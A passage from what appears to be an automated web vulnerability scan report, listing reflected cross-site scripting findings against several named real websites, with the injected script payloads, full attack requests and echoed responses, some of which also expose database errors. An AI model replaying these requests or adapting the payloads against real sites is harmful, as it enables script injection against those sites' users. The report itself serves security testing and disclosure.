Set-Cookie: origGroupAppID=NoVariable; expires=Sun, 21-Dec-2036 05:00:00 GMT; path=/
Set-Cookie: firstvisit=11%2F25%2F2010+12%3A26%3A24+AM; expires=Sun, 21-Dec-2036 05:00:00 GMT; path=/
Set-Cookie: querystring=404%3Bhttp%3A%2F%2Fwww%2Eihirequalitycontrol%2Ecom%3A80%2Fcb928%27%3B029bccb30a5%3D; expires=Sun, 21-Dec-2036 05:00:00 GMT; path=/
Set-Cookie: srv=WEBSRV110; expires=Thu, 06-Jan-2011 05:26:24 GMT; path=/
Set-Cookie: actualsearchterm=NoVARIABLE; expires=Sun, 21-Dec-2036 05:00:00 GMT; path=/
Set-Cookie: campaignsearchterm=NoVARIABLE; expires=Sun, 21-Dec-2036 05:00:00 GMT; path=/
Set-Cookie: campaigntype=querystring; expires=Sun, 21-Dec-2036 05:00:00 GMT; path=/
Set-Cookie: campaign=NoVARIABLE; expires=Sun, 21-Dec-2036 05:00:00 GMT; path=/
Set-Cookie: RandomID=8; expires=Thu, 06-Jan-2011 05:26:24 GMT; path=/
Set-Cookie: ctGuid=%7B4D2EC575%2D0FFE%2D4DBA%2D93A1%2D53C5ECBE4FA3%7D; expires=Sun, 21-Dec-2036 05:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDACBBAAAD=PIMLHCNCDALFEMPBHBPLEDKF; path=/
X-Powered-By: ASP.NET
Date: Thu, 25 Nov 2010 05:26:24 GMT
Connection: close


<base href="http://www.iHireQualityControl.com">


<html>
<head>

       <TITLE>cb928';029bccb30a5 on iHireQualityControl.com</TITLE>
       <META NAME="ROBOTS" CONTENT="index,follow">
       <META NAME
...[SNIP]...
<script type="text/javascript">
s.pageType = "errorPage";
s.pageName = '404;http://www.ihirequalitycontrol.com:80/cb928';029bccb30a5';
</script>
...[SNIP]...

2.225. http://www.jobboom.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jobboom.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a2dd"><script>alert(1)</script>c82b05ef1d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?6a2dd"><script>alert(1)</script>c82b05ef1d6=1 HTTP/1.1
Host: www.jobboom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 05:28:59 GMT
Server: Apache
Set-Cookie: PHPSESSID=203e4eab17366614964fd3148be50be0; path=/; domain=.jobboom.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
ServerID: jobboom-prod-fe-02
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 15757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
<head>
<title>Jobbo
...[SNIP]...
<a href="/?6a2dd"><script>alert(1)</script>c82b05ef1d6=1?pref_jobboom=1&pref_langue=en_CA&sauvegarde=1&pref_province=AB">
...[SNIP]...

2.226. http://www.joostdevalk.nl/code/sortable-table/. [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.joostdevalk.nl
Path:   /code/sortable-table/.

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d2aa"><script>alert(1)</script>2c3302300fd was submitted in the REST URL parameter 1. This input was echoed as 7d2aa\"><script>alert(1)</script>2c3302300fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /code7d2aa"><script>alert(1)</script>2c3302300fd/sortable-table/. HTTP/1.1
Host: www.joostdevalk.nl
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 05:29:23 GMT
Server: LiteSpeed
Connection: close
Set-Cookie: PHPSESSID=e3ba843388528fe3cfe0fb71ab6ac294; path=/
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Powered-By: W3 Total Cache/0.9.1.2
Last-Modified: Thu, 25 Nov 2010 05:29:23 GMT
Vary: Cookie
Expires: Thu, 25 Nov 2010 06:29:23 GMT
X-Pingback: http://yoast.com/xmlrpc.php
Content-Type: text/html; charset=utf-8
Vary: User-Agent
Content-Length: 14472

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile="http://
...[SNIP]...
<input
type="hidden" value="http://www.joostdevalk.nl/code7d2aa\"><script>alert(1)</script>2c3302300fd/sortable-table/./" name="MMERGE6" class="" id="mce-MMERGE6"/>
...[SNIP]...

2.227. http://www.joostdevalk.nl/code/sortable-table/. [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.joostdevalk.nl
Path:   /code/sortable-table/.

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93246"><script>alert(1)</script>f4145b3bd95 was submitted in the REST URL parameter 2. This input was echoed as 93246\"><script>alert(1)</script>f4145b3bd95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /code/sortable-table93246"><script>alert(1)</script>f4145b3bd95/. HTTP/1.1
Host: www.joostdevalk.nl
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 05:29:28 GMT
Server: LiteSpeed
Connection: close
Set-Cookie: PHPSESSID=314fa16cad38be433376836d0ba4bcb3; path=/
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Powered-By: W3 Total Cache/0.9.1.2
Last-Modified: Thu, 25 Nov 2010 05:29:27 GMT
Vary: Cookie
Expires: Thu, 25 Nov 2010 06:29:28 GMT
X-Pingback: http://yoast.com/xmlrpc.php
Content-Type: text/html; charset=utf-8
Vary: User-Agent
Content-Length: 14472

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile="http://
...[SNIP]...
<input
type="hidden" value="http://www.joostdevalk.nl/code/sortable-table93246\"><script>alert(1)</script>f4145b3bd95/./" name="MMERGE6" class="" id="mce-MMERGE6"/>
...[SNIP]...

2.228. http://www.joostdevalk.nl/code/sortable-table/. [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.joostdevalk.nl
Path:   /code/sortable-table/.

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 812e2"><script>alert(1)</script>a01aa50342c was submitted in the REST URL parameter 3. This input was echoed as 812e2\"><script>alert(1)</script>a01aa50342c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /code/sortable-table/.812e2"><script>alert(1)</script>a01aa50342c HTTP/1.1
Host: www.joostdevalk.nl
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 05:29:32 GMT
Server: LiteSpeed
Connection: close
Set-Cookie: PHPSESSID=4384e891dadf8af119676603a3140c2e; path=/
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Powered-By: W3 Total Cache/0.9.1.2
Last-Modified: Thu, 25 Nov 2010 05:29:32 GMT
Vary: Cookie
Expires: Thu, 25 Nov 2010 06:29:32 GMT
X-Pingback: http://yoast.com/xmlrpc.php
Content-Type: text/html; charset=utf-8
Vary: User-Agent
Content-Length: 14472

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile="http://
...[SNIP]...
<input
type="hidden" value="http://www.joostdevalk.nl/code/sortable-table/.812e2\"><script>alert(1)</script>a01aa50342c/" name="MMERGE6" class="" id="mce-MMERGE6"/>
...[SNIP]...

2.229. http://www.kayak.com/in [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kayak.com
Path:   /in

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload b070c<script>alert(1)</script>659eda8a771 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /in?ai=&p=&url=b070c<script>alert(1)</script>659eda8a771 HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-UA-Compatible: IE=8
Content-Type: text/html;charset=utf-8
Date: Thu, 25 Nov 2010 05:29:27 GMT
Content-Length: 5866
Connection: close
Set-Cookie: Apache=rnneEg-AAABLIGB9zk-33-Ta8$VQ; path=/; expires=Wed, 21-Aug-13 05:29:27 GMT; domain=.kayak.com
Set-Cookie: kayak=; Domain=.kayak.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: kayak=wNfnTw5$A7Gx7zTCsUxK; Expires=Sun, 24-Nov-2013 05:29:27 GMT; Path=/
Set-Cookie: dc=; Domain=.kayak.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: dc=dc1; Path=/
Set-Cookie: cluster=; Domain=.kayak.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cluster=2; Path=/
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Cache-Control: pre-check=0, post-check=0
Expires: 0


<!-- Copyright 2004-2010 Kayak Software Corp, All Rights Reserved. -->

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.d
...[SNIP]...
</script>659eda8a771">b070c<script>alert(1)</script>659eda8a771</a>
...[SNIP]...

2.230. http://www.kayak.com/in [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kayak.com
Path:   /in

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbbb7"><script>alert(1)</script>919e2b748f2 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /in?ai=&p=&url=%2Fh%2Fbuzz%2Fview%3Fac%3D%26action%3Dcreate%26airport%3DBOS%26code%3DBOS%26dt%3DA%26t%3D%26mc%3DUSD%26dest1%3DLAS%26desthint1%3DLAS\u003c/link\u003e\ndbbb7"><script>alert(1)</script>919e2b748f2 HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-UA-Compatible: IE=8
Content-Type: text/html;charset=utf-8
Date: Thu, 25 Nov 2010 05:29:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=rnneEg-AAABLIGB87A-33-UkXU$g; path=/; expires=Wed, 21-Aug-13 05:29:26 GMT; domain=.kayak.com
Set-Cookie: kayak=; Domain=.kayak.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: kayak=V9eEE2yOjmc8WUo0nTdm; Expires=Sun, 24-Nov-2013 05:29:26 GMT; Path=/
Set-Cookie: dc=; Domain=.kayak.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: dc=dc2; Path=/
Set-Cookie: cluster=; Domain=.kayak.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cluster=4; Path=/
Set-Cookie: p2.med.sid=; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: p.med.sid=; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: p1.med.sid=; Domain=.kayak.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: p1.med.sid=21-dJOGS$cxhYOsLNUpXpse; Path=/
Set-Cookie: p1.med.token=; Domain=.kayak.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: p1.med.token=916QQTYki_v6gWAgo83Zdg; Expires=Mon, 24-Jan-2011 05:29:26 GMT; Path=/
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Cache-Control: pre-check=0, post-check=0
Expires: 0
Expires: 0
Content-Length: 40095

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
KAYAK Top
...[SNIP]...
<input name="desthint1" type="hidden" value="LAS\u003c/link\u003e\ndbbb7"><script>alert(1)</script>919e2b748f2">
...[SNIP]...

2.231. http://www.kelownakiosk.com/directory.php [categoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.kelownakiosk.com
Path:   /directory.php

Issue detail

The value of the categoryId request parameter is copied into the HTML document as plain text between tags. The payload d09c3<a>03a0a334d8f was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /directory.php?name=Consulting&categoryId=228d09c3<a>03a0a334d8f HTTP/1.1
Host: www.kelownakiosk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 05:30:06 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.0 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.0
Connection: close
Content-Type: text/html
Content-Length: 1342

mysql error: [1054: Unknown column '228d09c3' in 'where clause'] in EXECUTE("SELECT parent_category_id FROM category WHERE category_id = 228d09c3<a>03a0a334d8f ORDER BY name ASC")
<pre align=left> &nb
...[SNIP]...

2.232. http://www.kitchenerkiosk.com/directory.php [categoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.kitchenerkiosk.com
Path:   /directory.php

Issue detail

The value of the categoryId request parameter is copied into the HTML document as plain text between tags. The payload 3cd87<a>b1a50f84d9c was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /directory.php?name=Consulting&categoryId=2283cd87<a>b1a50f84d9c HTTP/1.1
Host: www.kitchenerkiosk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 05:30:19 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.0 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.0
Connection: close
Content-Type: text/html
Content-Length: 1342

mysql error: [1054: Unknown column '2283cd87' in 'where clause'] in EXECUTE("SELECT parent_category_id FROM category WHERE category_id = 2283cd87<a>b1a50f84d9c ORDER BY name ASC")
<pre align=left> &nb
...[SNIP]...

2.233. http://www.legalaid.on.ca/en/getting/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.legalaid.on.ca
Path:   /en/getting/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79e76"><script>alert(1)</script>8d7ae6731a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/getting/?79e76"><script>alert(1)</script>8d7ae6731a4=1 HTTP/1.1
Host: www.legalaid.on.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Nov 2010 05:35:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 22813
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCACRTTTQ=FBCIOELCHEOHEPMFEGLBLPAF; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Legal Aid Ontario: Getting Legal Help</title>

<m
...[SNIP]...
<a href="http://www.legalaid.on.ca/fr/getting/default.asp?79e76"><script>alert(1)</script>8d7ae6731a4=1">
...[SNIP]...

2.234. http://www.legalaid.on.ca/en/getting/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.legalaid.on.ca
Path:   /en/getting/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4184a--><script>alert(1)</script>98c3684d0d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/getting/?4184a--><script>alert(1)</script>98c3684d0d0=1 HTTP/1.1
Host: www.legalaid.on.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Nov 2010 05:35:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 22815
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCACRTTTQ=IBCIOELCEKFJMEIMOGHLFMGN; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Legal Aid Ontario: Getting Legal Help</title>

<m
...[SNIP]...
<a href="http://www.legalaid.on.ca/fr/getting/default.asp?4184a--><script>alert(1)</script>98c3684d0d0=1">
...[SNIP]...

2.235. http://www.londonkiosk.ca/directory.php [categoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.londonkiosk.ca
Path:   /directory.php

Issue detail

The value of the categoryId request parameter is copied into the HTML document as plain text between tags. The payload 3ff76<a>f6acfe1ed56 was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /directory.php?name=Consulting&categoryId=2283ff76<a>f6acfe1ed56 HTTP/1.1
Host: www.londonkiosk.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 05:36:26 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.0 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.0
Connection: close
Content-Type: text/html
Content-Length: 1342

mysql error: [1054: Unknown column '2283ff76' in 'where clause'] in EXECUTE("SELECT parent_category_id FROM category WHERE category_id = 2283ff76<a>f6acfe1ed56 ORDER BY name ASC")
<pre align=left> &nb
...[SNIP]...

2.236. http://www.montrealkiosk.com/directory.php [%20Services&categoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.montrealkiosk.com
Path:   /directory.php

Issue detail

The value of the %20Services&categoryId request parameter is copied into the HTML document as plain text between tags. The payload c8d81<a>31fea90d260 was submitted in the %20Services&categoryId parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /directory.php?name=Business%20&%20Services&categoryId=167c8d81<a>31fea90d260 HTTP/1.1
Host: www.montrealkiosk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181040571.1290654039.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=181040571.1113724292.1290654039.1290654039.1290654039.1; __utmc=181040571; __utmb=181040571;

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:09:38 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.0 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.0
Connection: close
Content-Type: text/html
Content-Length: 1342

mysql error: [1054: Unknown column '167c8d81' in 'where clause'] in EXECUTE("SELECT parent_category_id FROM category WHERE category_id = 167c8d81<a>31fea90d260 ORDER BY name ASC")
<pre align=left> &nb
...[SNIP]...

2.237. http://www.montrealkiosk.com/directory.php [categoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.montrealkiosk.com
Path:   /directory.php

Issue detail

The value of the categoryId request parameter is copied into the HTML document as plain text between tags. The payload c3cc1<a>86876869d34 was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /directory.php?categoryId=228c3cc1<a>86876869d34 HTTP/1.1
Host: www.montrealkiosk.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:05:29 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.0 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.0
Content-Type: text/html
Content-Length: 1342

mysql error: [1054: Unknown column '228c3cc1' in 'where clause'] in EXECUTE("SELECT parent_category_id FROM category WHERE category_id = 228c3cc1<a>86876869d34 ORDER BY name ASC")
<pre align=left> &nb
...[SNIP]...

2.238. http://www.nationalpost.com/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nationalpost.com
Path:   /x22

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 108be'%3b09a4592ac0c was submitted in the REST URL parameter 1. This input was echoed as 108be';09a4592ac0c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /x22108be'%3b09a4592ac0c HTTP/1.1
Host: www.nationalpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Thu, 25 Nov 2010 02:26:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 25 Nov 2010 02:26:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39030


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/npo.com/x22108be';09a4592ac0c/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=x22108be';09a4592ac0c;kw=npo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=11565493?">
...[SNIP]...

2.239. http://www.refcodeanalytics.com/js/trackerCode.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.refcodeanalytics.com
Path:   /js/trackerCode.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 68320<script>alert(1)</script>a521c5ddfe9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js68320<script>alert(1)</script>a521c5ddfe9/trackerCode.js HTTP/1.1
Host: www.refcodeanalytics.com
Proxy-Connection: keep-alive
Referer: http://www.mastermindsolutions.ca/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 02:19:54 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=8d75bb6702aed0a54b4963459c333c11; path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
               "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
               lang="en">
   <body>
       <h1>
...[SNIP]...
<p>
           The Requested URL /js68320<script>alert(1)</script>a521c5ddfe9/trackerCode.js was not found on this server.
       </p>
...[SNIP]...

2.240. http://www.refcodeanalytics.com/js/trackerCode.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.refcodeanalytics.com
Path:   /js/trackerCode.js

Issue detail

